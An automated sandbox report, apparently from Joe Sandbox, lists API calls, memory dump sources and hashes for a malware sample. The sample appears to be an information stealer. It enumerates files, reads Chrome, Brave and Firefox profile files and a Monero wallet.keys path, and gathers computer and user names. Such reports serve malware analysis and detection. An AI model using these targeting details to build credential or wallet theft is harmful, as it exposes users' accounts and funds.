                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 1080c009babe04d8aac59d6e2f44e6ec8c4771435ab6015e62d00e88463657a7
                                  • Instruction ID: c1907979fe9eda28e858f5f94a8e360d079e9c9ccf0ebc8dddf03d8d79a5c59a
                                  • Opcode Fuzzy Hash: 1080c009babe04d8aac59d6e2f44e6ec8c4771435ab6015e62d00e88463657a7
                                  • Instruction Fuzzy Hash: 8EE0E670945308FFE7646BA0AD1AB1D7E7CAF04B12F504154F709B71C4D6B52A40D799
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00F610B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00F610F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: 7cf6e4fea13a8241046b43def3bd8afc9523141ac457e1da5aa381eee15a9c9f
                                  • Instruction ID: bb8dc0ef76073ab24442318bf14207dbdba745994ea7123563e56cf283380c3c
                                  • Opcode Fuzzy Hash: 7cf6e4fea13a8241046b43def3bd8afc9523141ac457e1da5aa381eee15a9c9f
                                  • Instruction Fuzzy Hash: 21F02E71641304BBEB1496A4AC49FBFB7ECE705B15F300454F504E3280D5715F40DB50
                                  APIs
                                    • Part of subcall function 00F778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F77910
                                    • Part of subcall function 00F778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00F77917
                                    • Part of subcall function 00F778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00F7792F
                                    • Part of subcall function 00F77850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F611B7), ref: 00F77880
                                    • Part of subcall function 00F77850: RtlAllocateHeap.NTDLL(00000000), ref: 00F77887
                                    • Part of subcall function 00F77850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F7789F
                                  • ExitProcess.KERNEL32 ref: 00F611C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: a1986d3e1d59222e8354595c035e8b0b7447145cde1c9ad9e8f92a27431143df
                                  • Instruction ID: 41cc1f9133db1365584e8e95368ecf5996fd22a87d1a63b7a799c0cc380b5b47
                                  • Opcode Fuzzy Hash: a1986d3e1d59222e8354595c035e8b0b7447145cde1c9ad9e8f92a27431143df
                                  • Instruction Fuzzy Hash: 56E012B5D5430163DA1477B0BC0AB2A3A9C6F15385F54443AFA1DD3502FA2DF841E66B
                                  APIs
                                  • wsprintfA.USER32 ref: 00F738CC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00F738E3
                                  • lstrcat.KERNEL32(?,?), ref: 00F73935
                                  • StrCmpCA.SHLWAPI(?,00F80F70), ref: 00F73947
                                  • StrCmpCA.SHLWAPI(?,00F80F74), ref: 00F7395D
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F73C67
                                  • FindClose.KERNEL32(000000FF), ref: 00F73C7C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: 67f1913246c91aaf5ed42e3d439ce01b427e518ae90e3226d7752ef040473b28
                                  • Instruction ID: a644587852b18a1b8ec35c1a1196501f314297ecc8faf1fa0c8c3a7f2d696626
                                  • Opcode Fuzzy Hash: 67f1913246c91aaf5ed42e3d439ce01b427e518ae90e3226d7752ef040473b28
                                  • Instruction Fuzzy Hash: C9A1A2B2900208ABDB34DFA4DC85FEE7778BF88300F448599A61D97145EB749B84DF62
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00F80B32,00F80B2B,00000000,?,?,?,00F813F4,00F80B2A), ref: 00F6BEF5
                                  • StrCmpCA.SHLWAPI(?,00F813F8), ref: 00F6BF4D
                                  • StrCmpCA.SHLWAPI(?,00F813FC), ref: 00F6BF63
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F6C7BF
                                  • FindClose.KERNEL32(000000FF), ref: 00F6C7D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-726946144
                                  • Opcode ID: 875dc1eb398d6668bf6cd31a563536c76adecc9e3aaffa03954b5c2b044cbedf
                                  • Instruction ID: 3168005f912d5b290a028fb83a99321693a3c88cf6b1d1ab87491a44330489c8
                                  • Opcode Fuzzy Hash: 875dc1eb398d6668bf6cd31a563536c76adecc9e3aaffa03954b5c2b044cbedf
                                  • Instruction Fuzzy Hash: B14241729001089BDB18FB70DD96EEE737CAF94300F418569B51A97181EF389B49EB93
                                  APIs
                                  • wsprintfA.USER32 ref: 00F7492C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00F74943
                                  • StrCmpCA.SHLWAPI(?,00F80FDC), ref: 00F74971
                                  • StrCmpCA.SHLWAPI(?,00F80FE0), ref: 00F74987
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F74B7D
                                  • FindClose.KERNEL32(000000FF), ref: 00F74B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: 4d1ed636def556ee8c079b5367ead0a68003d9b129d9e0f98acf51c46094d406
                                  • Instruction ID: 08e42224dd57ea5b05f69a5a38786c4c693cedbcabaf5c4500365d2882159398
                                  • Opcode Fuzzy Hash: 4d1ed636def556ee8c079b5367ead0a68003d9b129d9e0f98acf51c46094d406
                                  • Instruction Fuzzy Hash: BB617472900218ABCB74EBA0EC45EEA777CBF88301F448599A61D97044EB35EB85DF91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00F74580
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F74587
                                  • wsprintfA.USER32 ref: 00F745A6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00F745BD
                                  • StrCmpCA.SHLWAPI(?,00F80FC4), ref: 00F745EB
                                  • StrCmpCA.SHLWAPI(?,00F80FC8), ref: 00F74601
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F7468B
                                  • FindClose.KERNEL32(000000FF), ref: 00F746A0
                                  • lstrcat.KERNEL32(?,016FE550), ref: 00F746C5
                                  • lstrcat.KERNEL32(?,016FD1B8), ref: 00F746D8
                                  • lstrlen.KERNEL32(?), ref: 00F746E5
                                  • lstrlen.KERNEL32(?), ref: 00F746F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: 519b29c866c69d627eec961128b8343dfaa47dbce3f3f71cc53c5953a849220f
                                  • Instruction ID: f8e79cbab3afb3bc1c4b5158041e205e5db4236c1abde9874ee9c6aaf49edb7e
                                  • Opcode Fuzzy Hash: 519b29c866c69d627eec961128b8343dfaa47dbce3f3f71cc53c5953a849220f
                                  • Instruction Fuzzy Hash: E45164719402189BC764EBB0DC89FEA777CAF58700F408599B61E92044EB749A85DF92
                                  APIs
                                  • wsprintfA.USER32 ref: 00F73EC3
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00F73EDA
                                  • StrCmpCA.SHLWAPI(?,00F80FAC), ref: 00F73F08
                                  • StrCmpCA.SHLWAPI(?,00F80FB0), ref: 00F73F1E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F7406C
                                  • FindClose.KERNEL32(000000FF), ref: 00F74081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: 2b7a1fa909a5f53b01402200e49f433c78e3d04f4fe440fe036fa48dc11772ac
                                  • Instruction ID: f35390e718ea3fb68d4eb88335c83dd6368d7f4811678ac02f5b557f79bd9e54
                                  • Opcode Fuzzy Hash: 2b7a1fa909a5f53b01402200e49f433c78e3d04f4fe440fe036fa48dc11772ac
                                  • Instruction Fuzzy Hash: 925164B2900218ABCB68EBB0DC85EEA777CBF44700F408599B25D97044DB75EB89DF51
                                  APIs
                                  • wsprintfA.USER32 ref: 00F6ED3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00F6ED55
                                  • StrCmpCA.SHLWAPI(?,00F81538), ref: 00F6EDAB
                                  • StrCmpCA.SHLWAPI(?,00F8153C), ref: 00F6EDC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F6F2AE
                                  • FindClose.KERNEL32(000000FF), ref: 00F6F2C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: 3117aaefe9f13e749a1901490f6993e7bd5c66b44b6107a370366b9fcd874493
                                  • Instruction ID: d92d0deb2f805c7a0c00b7db12c47478240567db01ac8fdd687cdf06998112fb
                                  • Opcode Fuzzy Hash: 3117aaefe9f13e749a1901490f6993e7bd5c66b44b6107a370366b9fcd874493
                                  • Instruction Fuzzy Hash: 42E1F6729111189AEB54FB60DC51EEE733CAF94300F4181AAB51E62092EF346F9ADF53
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F815B8,00F80D96), ref: 00F6F71E
                                  • StrCmpCA.SHLWAPI(?,00F815BC), ref: 00F6F76F
                                  • StrCmpCA.SHLWAPI(?,00F815C0), ref: 00F6F785
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F6FAB1
                                  • FindClose.KERNEL32(000000FF), ref: 00F6FAC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: 91f0be6bef8cc10e2a5904726f9498138260918dc75a50e113bd18c7cdabe5bb
                                  • Instruction ID: a3f0d7c6e6f3ba596e0a30227922dac01af073e33e4971f88660bb1ba99f2917
                                  • Opcode Fuzzy Hash: 91f0be6bef8cc10e2a5904726f9498138260918dc75a50e113bd18c7cdabe5bb
                                  • Instruction Fuzzy Hash: 25B153719001089BDB28FF74DC56EEE7379AF94300F4181A9A41E97181EF346B4AEB93
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: )}w$.ew$.>H$1$?.$B#+7$J5hR$^"<?$dh|O$e;k$h/$!B?
                                  • API String ID: 0-964770783
                                  • Opcode ID: 51efc06258ac19eb311c4988fca72fb8c55af621e39ab9e8a0e3be5df83d82a0
                                  • Instruction ID: 3c51e1fd408d199a1b5e4c78c62f5530f9de13d918a1b368f672d916a5eb99d9
                                  • Opcode Fuzzy Hash: 51efc06258ac19eb311c4988fca72fb8c55af621e39ab9e8a0e3be5df83d82a0
                                  • Instruction Fuzzy Hash: C4B208F3A0C2009FE304AE2DDC8566AF7E5EF94720F1A893DEAC4C7744EA3558458697
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F8510C,?,?,?,00F851B4,?,?,00000000,?,00000000), ref: 00F61923
                                  • StrCmpCA.SHLWAPI(?,00F8525C), ref: 00F61973
                                  • StrCmpCA.SHLWAPI(?,00F85304), ref: 00F61989
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F61D40
                                  • DeleteFileA.KERNEL32(00000000), ref: 00F61DCA
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F61E20
                                  • FindClose.KERNEL32(000000FF), ref: 00F61E32
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: 3f88ec8b84c1b41c3f1a826849db7b254f92b04848ac64f14c18528a87282693
                                  • Instruction ID: 4fd1dd11605abd8b23c4c3da2a872923c44b13f3d5b173b248f5c404faadf844
                                  • Opcode Fuzzy Hash: 3f88ec8b84c1b41c3f1a826849db7b254f92b04848ac64f14c18528a87282693
                                  • Instruction Fuzzy Hash: 381226719101189BDB55FB60CC96EEE7378AF94300F41819AB11E62091EF386F99EF93
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00F80C2E), ref: 00F6DE5E
                                  • StrCmpCA.SHLWAPI(?,00F814C8), ref: 00F6DEAE
                                  • StrCmpCA.SHLWAPI(?,00F814CC), ref: 00F6DEC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F6E3E0
                                  • FindClose.KERNEL32(000000FF), ref: 00F6E3F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: 715ded1d342ce3bf4e02d3913506f67f0e2ad20782700c87304d69321e60a52b
                                  • Instruction ID: 36835ae1ab89345eea27483e37308c00cf266fbd0089076bd5966d701e7867ab
                                  • Opcode Fuzzy Hash: 715ded1d342ce3bf4e02d3913506f67f0e2ad20782700c87304d69321e60a52b
                                  • Instruction Fuzzy Hash: EBF1A0718141189ADB29FB60DC95EEE7338BF54300F8181EAA51E62091EF346F9ADF53
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F814B0,00F80C2A), ref: 00F6DAEB
                                  • StrCmpCA.SHLWAPI(?,00F814B4), ref: 00F6DB33
                                  • StrCmpCA.SHLWAPI(?,00F814B8), ref: 00F6DB49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00F6DDCC
                                  • FindClose.KERNEL32(000000FF), ref: 00F6DDDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 1b66330b0cbc17c64d31619ff25769a709d822f3ba5d099cc2fe3b3bff47529d
                                  • Instruction ID: 6eb62701f55e46bf85ff9cadec920bf12ac5916baf8dffc8eaa03248280041ec
                                  • Opcode Fuzzy Hash: 1b66330b0cbc17c64d31619ff25769a709d822f3ba5d099cc2fe3b3bff47529d
                                  • Instruction Fuzzy Hash: 2B916372A0010897CB14FBB0EC56DEE773CAFC4300F418669B81A97185EE389B59DB93
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
